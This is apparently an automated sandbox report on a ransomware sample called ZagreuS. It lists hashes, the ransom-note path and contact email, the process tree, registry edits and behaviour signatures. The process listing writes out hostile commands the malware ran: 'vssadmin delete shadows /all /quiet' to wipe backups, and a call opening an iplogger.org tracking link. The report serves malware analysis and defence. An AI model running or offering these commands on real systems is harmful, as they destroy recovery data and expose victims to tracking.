Analysis
-
max time kernel
142s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
20-05-2022 09:34
Static task
static1
Behavioral task
behavioral1
Sample
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
Resource
win10v2004-20220414-en
General
-
Target
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
-
Size
750KB
-
MD5
0f081afaae11c154edb8df747d612f93
-
SHA1
7b1478e64453d78ff60eda7b1d2cc3623d4a9210
-
SHA256
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858
-
SHA512
4b76bd14bcdf5a5e0a73fe630dc430968d59a7c132b00cb9e12674ff6d6472a726b5ed7796fa1481eb7e7b2aacdbc356a3b028c2b3eb2cbd13af1650f3d20628
Malware Config
Extracted
C:\Users\Admin\Downloads\HELP_DECRYPT_YOUR_FILES.txt
uncrushman@protonmail.com
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
Processes:
ZagreuS.Ransom.exepid process 520 ZagreuS.Ransom.exe -
Loads dropped DLL 4 IoCs
Processes:
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exepid process 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Generic Ransomware Note 11 IoCs
Ransomware often writes a note containing information on how to pay the ransom.
Processes:
yara_rule generic_ransomware_note generic_ransomware_note generic_ransomware_note \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe generic_ransomware_note \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe generic_ransomware_note \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe generic_ransomware_note \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe generic_ransomware_note C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe generic_ransomware_note C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe generic_ransomware_note behavioral1/memory/520-64-0x0000000000FA0000-0x0000000000FAC000-memory.dmp generic_ransomware_note C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt generic_ransomware_note -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 664 vssadmin.exe 1512 vssadmin.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004863fcdc101a3947b120786fa95ba35b000000000200000000001066000000010000200000004d1cc37b43295443d1124211e82edeea7121ae7d0be274e8ac341da1cfa8edac000000000e8000000002000020000000a9ac0e6f4eecbf126171806234d03ebfbc1fa8cf6948c83a707f83a0d433946920000000d81d384bf47ffc5fb0f9b86e26a9ca581dab22f7824a1585b783020ff4932b484000000080e0d54f5499807199339d3e53e6aca727043c940edb09f38f140a89c7f85e13d131403b7b14b03e49515084abacb84b803fafa5b00be613923517ce8880f453 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 502273e82c6cd801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0E2BF671-D820-11EC-BC64-62D05D50A506} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004863fcdc101a3947b120786fa95ba35b00000000020000000000106600000001000020000000b02db130897b7e4fab99534012ca0d0eebf8baa4ca738679036cf82a95a4983b000000000e8000000002000020000000e988dacaca7a0983d8fa6fed718cf6e2e490a7e7ffa19a1fb4d0051feb2e16fd90000000c5f56d3f14287cd2316d77ba01c018a0acdde1fc97dc145441e92d5f720848773afc51a833a01100a1dba3241d7db6146daefb886df4d25330ff44164f4e166369a64dd7d774943193267025a914b32ffc3c8a1e594276506ae84f0dab782955dd3e86888f5245e157d3e0ecdd560c0b04463f12adc5ed0bfce908780c8707a819c049b048b7545ca1b1baf05f722f2d400000005f0d11647b18ab0e5f54ab2e768c01871407ef9fa0920934879559edc0b1ac54ec2863576428454fd476b443dd5eca7736e419b9182560518f5c6ff7fce16138 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "359804248" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 1968 NOTEPAD.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 1764 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
vssvc.exedescription pid process Token: SeBackupPrivilege 1340 vssvc.exe Token: SeRestorePrivilege 1340 vssvc.exe Token: SeAuditPrivilege 1340 vssvc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1060 iexplore.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
AcroRd32.exeiexplore.exeIEXPLORE.EXEpid process 1764 AcroRd32.exe 1764 AcroRd32.exe 1764 AcroRd32.exe 1060 iexplore.exe 1060 iexplore.exe 1948 IEXPLORE.EXE 1948 IEXPLORE.EXE 1948 IEXPLORE.EXE 1948 IEXPLORE.EXE 1948 IEXPLORE.EXE 1948 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exeZagreuS.Ransom.execmd.execmd.execmd.exeiexplore.exedescription pid process target process PID 1808 wrote to memory of 520 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe ZagreuS.Ransom.exe PID 1808 wrote to memory of 520 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe ZagreuS.Ransom.exe PID 1808 wrote to memory of 520 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe ZagreuS.Ransom.exe PID 1808 wrote to memory of 520 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe ZagreuS.Ransom.exe PID 1808 wrote to memory of 1764 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe AcroRd32.exe PID 1808 wrote to memory of 1764 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe AcroRd32.exe PID 1808 wrote to memory of 1764 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe AcroRd32.exe PID 1808 wrote to memory of 1764 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe AcroRd32.exe PID 520 wrote to memory of 1052 520 ZagreuS.Ransom.exe cmd.exe PID 520 wrote to memory of 1052 520 ZagreuS.Ransom.exe cmd.exe PID 520 wrote to memory of 1052 520 ZagreuS.Ransom.exe cmd.exe PID 520 wrote to memory of 1380 520 ZagreuS.Ransom.exe cmd.exe PID 520 wrote to memory of 1380 520 ZagreuS.Ransom.exe cmd.exe PID 520 wrote to memory of 1380 520 ZagreuS.Ransom.exe cmd.exe PID 1380 wrote to memory of 664 1380 cmd.exe vssadmin.exe PID 1380 wrote to memory of 664 1380 cmd.exe vssadmin.exe PID 1380 wrote to memory of 664 1380 cmd.exe vssadmin.exe PID 1052 wrote to memory of 1636 1052 cmd.exe reg.exe PID 1052 wrote to memory of 1636 1052 cmd.exe reg.exe PID 1052 wrote to memory of 1636 1052 cmd.exe reg.exe PID 520 wrote to memory of 1612 520 ZagreuS.Ransom.exe cmd.exe PID 520 wrote to memory of 1612 520 ZagreuS.Ransom.exe cmd.exe PID 520 wrote to memory of 1612 520 ZagreuS.Ransom.exe cmd.exe PID 1612 wrote to memory of 1512 1612 cmd.exe vssadmin.exe PID 1612 wrote to memory of 1512 1612 cmd.exe vssadmin.exe PID 1612 wrote to memory of 1512 1612 cmd.exe vssadmin.exe PID 520 wrote to memory of 1060 520 ZagreuS.Ransom.exe iexplore.exe PID 520 wrote to memory of 1060 520 ZagreuS.Ransom.exe iexplore.exe PID 520 wrote to memory of 1060 520 ZagreuS.Ransom.exe iexplore.exe PID 1060 wrote to memory of 1948 1060 iexplore.exe IEXPLORE.EXE PID 1060 wrote to memory of 1948 1060 iexplore.exe IEXPLORE.EXE PID 1060 wrote to memory of 1948 1060 iexplore.exe IEXPLORE.EXE PID 1060 wrote to memory of 1948 1060 iexplore.exe IEXPLORE.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
-
C:\Windows\system32\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2Y1Gy53⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1060 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt1⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdfFilesize
519KB
MD5f628a245651b09f63d2f888761d99543
SHA1f004b9a7b6be37ba12d05167073cc2804b08ab64
SHA256de51caa63ba814dc3aa4024a7ad2bf7b8e4ccdf7caf0f355857ab02a3d796bb6
SHA512842b4cb2763df75215301213b705748cfd3377ce0dd467d7c9b6a8b7e3386964c1fb3fdef141b90c1012e76ebbef37e9759469b089c8d85db7cf9ca96ef2301d
-
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exeFilesize
27KB
MD5961d5eab06ae737f0425824c5cdb92d9
SHA156c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA2564f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA51256c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exeFilesize
27KB
MD5961d5eab06ae737f0425824c5cdb92d9
SHA156c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA2564f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA51256c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6I9G92W5.txtFilesize
605B
MD59fe3383fe866ac30958cfb27a720bad5
SHA1045a942300977b237aca9a902a87f4ad0cb34b6d
SHA2564ee227a761fb706173f6caca871b2d0b68bf87cb4e3f7ca0916d97a7393dfa5a
SHA51217a13616c617f0c1b22456346923f2ce856e7e1d2e6b0a8ce09fe663a901db1d8ffb85c6c5e9ad7f96e88bd5fc14c9742f097000b1c4f948db82d79f861514ab
-
C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txtFilesize
1KB
MD5ea4ae25750a7af617159abde94d61e59
SHA1f31c8f9ea2d2468fcb2a164712edbc9e0b2d4ba2
SHA25673e50c956d403d060a6c0a193caa17bb641c06785b06285729929efcbdba3c02
SHA5127c5f949ccd35ac77131ab528d3d2d95e6ae8899ba0e665036370eb9a5cf5557fefdd865e5c59a52795891903f968512a83efbe37edecb03c57c8573c757cf03a
-
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exeFilesize
27KB
MD5961d5eab06ae737f0425824c5cdb92d9
SHA156c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA2564f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA51256c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exeFilesize
27KB
MD5961d5eab06ae737f0425824c5cdb92d9
SHA156c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA2564f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA51256c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exeFilesize
27KB
MD5961d5eab06ae737f0425824c5cdb92d9
SHA156c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA2564f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA51256c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exeFilesize
27KB
MD5961d5eab06ae737f0425824c5cdb92d9
SHA156c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA2564f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA51256c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
memory/520-59-0x0000000000000000-mapping.dmp
-
memory/520-65-0x000007FEFB671000-0x000007FEFB673000-memory.dmpFilesize
8KB
-
memory/520-64-0x0000000000FA0000-0x0000000000FAC000-memory.dmpFilesize
48KB
-
memory/664-68-0x0000000000000000-mapping.dmp
-
memory/1052-66-0x0000000000000000-mapping.dmp
-
memory/1380-67-0x0000000000000000-mapping.dmp
-
memory/1512-72-0x0000000000000000-mapping.dmp
-
memory/1612-71-0x0000000000000000-mapping.dmp
-
memory/1636-69-0x0000000000000000-mapping.dmp
-
memory/1764-62-0x0000000000000000-mapping.dmp
-
memory/1808-54-0x0000000075BD1000-0x0000000075BD3000-memory.dmpFilesize
8KB